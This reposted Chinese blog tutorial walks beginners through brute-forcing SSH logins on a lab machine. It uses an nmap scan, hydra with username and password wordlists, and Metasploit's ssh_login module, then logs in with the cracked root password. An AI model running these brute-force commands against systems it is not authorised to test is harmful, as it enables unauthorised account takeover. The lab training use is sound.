0


ssh渗透与hydra爆破(简明不啰嗦)

适合新手上路,MSF与hydra两种方式渗透22端口,后进行远程连接,如有不足请各位见谅

此次实验仅供参考,切勿做违法犯罪,出事一切与本人无关后果自负,希望大家早日成为白帽子。

渗透机:kali

靶机:192.168.75.128

1.扫描局域网寻找22端口(开放)

nmap 192.168.75.1/24

2.已知192.168.75.128的22端口处于开放状态,22端口可以用hydra或msf爆破

第一种: hydra -L user.txt -P pass.txt -1 -vV -ens 192.168.75.128 ssh (比较慢且命令参数多)

Hydra -L user.txt -P pass.txt -V 192.168.75.128 ssh

第二个种MSF:

3.进入msfconsole

Search ssh_login 显示渗透指令

4.Use 0 设置第一种

5.查看配置信息

6.set rhosts 192.168.75.128 设置目标ip

8.set user_file user.txt 设置用户字典

9.set pass_file pass.txt 设置密码字典

10.exploit或run 开始爆破

爆破结果: 用户名root 密码:ban

11.ssh 192.168.75.128 输入用户名密码

实验结束

由于时间原因,大家可以直接采用hydra进行弱口令爆破,另外需自己准备好爆破字典,日后都会更新网安相关知识,感兴趣的伙伴点个关注,如有不足之处请见谅,本人也是刚写博客不久。


本文转载自: https://blog.csdn.net/yi152787/article/details/128668729
版权归原作者 柒氏 所有, 如有侵权,请联系我们删除。

“ssh渗透与hydra爆破(简明不啰嗦)”的评论:

还没有评论